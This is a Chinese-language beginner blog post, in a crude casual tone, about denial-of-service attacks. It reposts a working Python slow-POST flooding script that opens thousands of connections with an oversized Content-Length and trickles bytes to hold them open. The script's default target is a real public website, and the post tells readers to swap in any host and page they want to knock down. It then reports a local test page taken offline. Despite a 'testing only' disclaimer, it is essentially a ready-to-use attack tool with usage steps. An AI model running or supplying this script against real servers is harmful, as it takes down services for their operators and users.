首先聲明,以下僅作爲測試用,請勿作爲非法用途。
dos攻擊原理:DoS攻擊就是利用合理的服務請求來佔用過多的服務資源,從而使合法用戶無法得到服務的響應。(百度百科說的,大概就是這麼個意思)。
dos攻擊與ddos攻擊的區別就是,它是一對一的攻擊,而ddos是分佈式的攻擊,作爲入門,作爲菜鳥,我們他媽哪裏有那麼多肉雞給你用。。。所以不過對付一些帶寬小,內存低,cpu渣的小型web服務器還是ok的。
現在,廢話不多說,本地搭建一個web站點測試一下。
測試地址:http://192.168.1.110/cloudmanage/admin.php#(本地的)
測試腳本:網上一堆。給大家轉載一個,如下:
#!/usr/bin/env python
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="www.baidu.com"
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf)
print "Send buf OK!,conn=%d\n"%i
socks.append(s)
except Exception,ex:
print "Could not connect to server or send error:%s"%ex
time.sleep(10)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f")
#print "send OK!"
except Exception,ex:
print "Send Exception:%s\n"%ex
socks.remove(s)
s.close()
time.sleep(1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
腳本來源是:http://blog.csdn.net/jeepxiaozi/article/details/8799684
以上是一個python腳本。
HOST="www.baidu.com"
PAGE="/index.php"
我們要改的是這兩處地方
改爲:
HOST=“192.168.1.110”//你要擼的主機ip地址/域名
PAGE=“/cloudmanage/admin.php”//你要擼的頁面
cmd命令行下執行腳本
刷刷刷,一連串socket連接。。。就開着唄。我們來看看現在網頁還可以訪問不?
顯然被日癱了。
別搞事情!
